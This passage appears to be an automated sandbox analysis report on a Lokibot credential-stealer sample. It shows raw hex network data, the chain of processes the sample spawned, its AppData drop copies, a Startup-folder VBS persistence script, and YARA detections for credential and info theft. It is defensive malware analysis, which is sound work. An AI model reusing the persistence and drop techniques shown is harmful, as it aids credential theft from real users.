2025-01-07 10:02:03 UTC	4096	IN	Data Raw: 08 f6 dc f5 1a f3 63 f3 91 d4 25 04 a6 88 e5 c8 f9 b2 ab ea ac ff f1 16 e7 35 cc 24 ef 77 dd fa f8 04 49 a5 ef 82 91 e1 0e 6e ed 82 a2 cd 99 8a 35 19 f6 ff e5 d5 f9 60 0c ca c1 5b ae 19 3d 84 c2 16 a0 2e 98 49 c5 7f 77 f6 8e e0 de 6f fa 84 04 9e 3c 16 34 6e e4 14 e8 45 a6 7f f0 f4 19 8c b6 78 9a 16 c9 27 8f a0 ec 40 5e ae fd 40 38 6a 0a 73 fc e9 14 8f 63 f4 90 71 20 b8 78 73 d3 94 40 6a 32 65 29 d2 0e 5e 15 f3 e4 bd 47 73 00 24 7a 3a cf 37 77 e5 0d 3f 7e 57 b6 97 7a e5 1a 2c d1 d3 b2 5f e6 d2 32 80 21 a0 82 2a 86 eb d5 82 99 37 a4 7c d5 27 73 c8 2f 73 98 5f f7 23 2f 9c 2c 3f 81 55 73 d6 18 24 8b 0c 0f ad 40 47 d7 2a e0 87 02 cf 64 e9 37 fd c9 2e d9 f4 54 4d fa 2b 0c 7d d8 78 0d e5 5e af 70 84 25 3e 9e 1a 6f b1 80 52 38 bf 83 e8 d1 22 39 e1 de 6a c7 54 f9 Data Ascii: c%5$wIn5`[=.Iwo<4nEx'@^@8jscq xs@j2e)^Gs$z:7w?~Wz,_2!7\|'s/s_#/,?Us$@Gd7.TM+}x^p%>oR8"9jT
2025-01-07 10:02:03 UTC	676	IN	Data Raw: b4 70 ba f3 85 da c9 05 24 a3 10 0c 86 b7 80 90 50 b1 66 d5 67 da cc c2 e8 b9 eb cd 4f 19 6a 0a 3d 06 38 b8 0d 4e fa 43 6a 6c 9a 3b 2f 4c b2 d7 fb 69 92 39 1e a7 76 d3 30 62 55 1c b3 a9 35 3c c3 39 48 dc 56 d5 ad 75 1b aa 56 83 b2 d1 bc dc c2 d4 5d 24 3e 9e 35 9f 7a 44 02 ef 27 5d fb a5 55 c4 fb c4 2a a5 dd bf 33 f2 63 d9 6b d8 af 76 de 33 e5 e3 93 75 dc 51 fe e0 13 b8 c0 a0 95 fa 4a 3a 50 66 dd be b9 1a ed 87 5e 4c e9 bf e1 62 8f 96 7e c2 11 bb 8b aa 7f ab ba c4 15 3d f3 3b 93 e5 c0 23 c1 f2 3a 6e 7a 2b 95 f4 05 c5 0c a1 32 9b 5b 54 b2 c3 ce 93 f6 b9 d0 9e 7c ba 9b 30 ea df c9 1d 4c 1e 83 d7 7b 1e 27 3e 3c 9c d3 7a aa ba d9 bd 8c f8 78 4f 20 09 c8 f0 45 b1 fb 0c 2f fb 70 eb 45 18 bf db b2 84 86 6f 5e c4 81 ff 94 69 1c ef 7c 71 64 d7 d9 f6 bd 6a 1d 87 cc Data Ascii: p$PfgOj=8NCjl;/Li9v0bU5<9HVuV]$>5zD']U*3ckv3uQJ:Pf^Lb~=;#:nz+2[T\|0L{'><zxO E/pEo^i\|qdj
2025-01-07 10:02:03 UTC	2674	IN	Data Raw: 07 9f 82 f3 cf dc 5e 28 04 fd fe 57 73 c8 fc 84 14 9a 96 bc 79 ed 35 08 18 b4 5e 73 0a 9b 3a 4a 30 77 63 b9 e6 cc 77 f4 d7 b5 66 3e ad 2b 95 bc ce f7 e5 d3 42 f3 0a b5 de 18 0c 2b d1 a5 b2 5e 54 0b c7 93 96 33 2b b4 e0 d6 0f 87 b5 3e 75 e3 f7 74 a7 a2 2e 4f 3d 00 c4 6a 1f 7d 6c 17 da e7 0b 89 eb 81 59 98 bc 49 65 aa 41 b3 29 f2 35 60 0d 60 58 ab f2 c7 eb 38 a1 27 8f 21 8e 28 d3 d9 50 0a 8a e8 33 b6 07 4c 91 7a 94 52 08 5a 78 49 a3 ba bc bc 29 5f 80 52 41 ee 4b 9d 13 e4 9f 0d 18 f4 82 d5 99 ce b4 fe 80 e9 05 26 ed 47 ca 46 95 f4 ed e8 eb 83 f6 0e c4 85 50 54 bc de 66 31 36 03 6b a0 ad 98 ec a1 29 46 3d db be b0 a9 7c e2 8f 8f c4 e9 35 ae ce 10 79 cb ec 29 5c d3 94 6f 56 ef 08 e9 d0 bd 1d ee df f8 d6 19 3a cd d9 1b c2 c2 1c 69 51 85 b6 47 10 11 01 27 f7 ea Data Ascii: ^(Wsy5^s:J0wcwf>+B+^T3+>ut.O=j}lYIeA)5``X8'!(P3LzRZxI)_RAK&GFPTf16k)F=\|5y)\oV:iQG'

Target ID:	0
Start time:	05:01:52
Start date:	07/01/2025
Path:	C:\Users\user\Desktop\9876567899.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\9876567899.bat.exe"
Imagebase:	0x710000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:01:53
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\9876567899.bat.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:01:54
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\9876567899.bat.exe"
Imagebase:	0xc10000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	05:02:00
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Roaming\Dhy2kmz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Dhy2kmz.exe"
Imagebase:	0x540000
File size:	57'976 bytes
MD5 hash:	CDD3D1BB178C391A905C40D2B292F4D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2153883300.0000000003E1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2169163154.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:02:05
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Roaming\Dhy2kmz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Dhy2kmz.exe"
Imagebase:	0x940000
File size:	57'976 bytes
MD5 hash:	CDD3D1BB178C391A905C40D2B292F4D6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	05:02:05
Start date:	07/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs"
Imagebase:	0x7ff707410000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:02:06
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:02:06
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 996
Imagebase:	0x800000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	05:02:07
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:02:08
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	05:02:09
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	05:02:10
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	05:02:11
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	05:02:12
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	05:02:13
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	05:02:14
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	05:02:15
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	05:02:16
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
